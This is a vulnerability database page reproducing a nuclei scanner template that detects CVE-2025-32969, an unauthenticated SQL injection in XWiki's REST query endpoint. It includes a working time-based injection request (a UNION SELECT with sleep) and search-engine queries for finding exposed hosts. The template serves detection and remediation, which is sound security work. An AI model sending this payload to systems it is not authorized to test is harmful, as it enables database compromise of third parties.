Lucene search
K

XWiki REST API Query - SQL Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

SQL injection in XWiki REST API query endpoint allows unauthenticated attackers to execute SQL via q parameter.

Related
Refs
Code
id: CVE-2025-32969

info:
  name: XWiki REST API Query - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    A SQL injection vulnerability exists in XWiki's REST API query endpoint. An unauthenticated attacker can execute arbitrary SQL queries through the 'q' parameter by manipulating the HQL query, potentially leading to data exfiltration or system compromise.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries through the REST API query endpoint, potentially leading to complete database compromise and data exfiltration.
  remediation: |
    Upgrade to the latest XWiki version that properly sanitizes HQL query parameters in the REST API.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-f69v-xrj8-rhxf
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32969
  classification:
    cve-id: CVE-2025-32969
    epss-score: 0.79487
    epss-percentile: 0.99557
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-89
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,sqli,rest-api,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        GET /rest/wikis/xwiki/query?q=where%20doc.name=length(%27a%27)*org.apache.logging.log4j.util.Chars.SPACE%20or%201%3C%3E%271%5C%27%27%20union%20select%201,2,3,sleep(7)%20%23%27&type=hql&distinct=0 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code==200'
          - 'contains_all(body, "WikiManager", "<?xml")'
          - 'contains(content_type, "text/javascript")'
        condition: and
# digest: 4a0a004730450221008c76bcd0b11d7719304e5943a1ea13c786450974cfd4b92584998d7a4db89096022037aa5359277625ac88d56a0875f544ef7c584d8155a330c6843c0d1ede4eca9f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
CVSS 49.3
EPSS0.79487
SSVC
15